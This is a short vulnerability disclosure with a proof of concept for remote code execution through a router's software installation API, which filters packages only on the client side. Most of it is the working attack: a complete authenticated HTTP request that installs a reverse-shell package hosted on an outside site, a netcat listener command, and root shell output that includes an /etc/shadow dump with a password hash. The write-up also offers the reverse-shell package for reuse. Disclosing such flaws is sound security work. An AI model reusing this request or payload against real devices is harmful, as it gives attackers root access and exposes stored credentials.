Abuse of Functionality leads to RCE
Through the software installation feature, it is possible to install arbitrary software, such as a reverse shell, as the filter in the available package list is limited to client-side verification. It is possible to install software from filesystem, list (as by the application logic) and from URL. In the Proof of Concept, the basic reverse shell connect to 192.168.8.140 on port 8888. Connection can be received with a netcat listener on port 8888. Package is available for your tests.
Proof of Concept:
Request
POST /cgi-bin/api/software/install HTTP/1.1
Host: 192.168.8.1
Content-Length: 66
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Authorization: ce0fc001ff684088a83257360de4bb44
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.8.1
Referer: http://192.168.8.1/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Admin-Token=ce0fc001ff684088a83257360de4bb44
Connection: close
name=http://onofri.org/storage/reverse_shell_1.0.0-1_mips_24kc.ipk
On the shell
% nc -l 8888
id
uid=0(root) gid=0(root)
cat /etc/shadow
root:$1$lchqx22V$LOxNwv3ggvnFw/kIyD2eB0:19256:0:99999:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
dnsmasq:x:0:0:99999:7:::
stubby:x:0:0:99999:7:::
pwd
/www/cgi-bin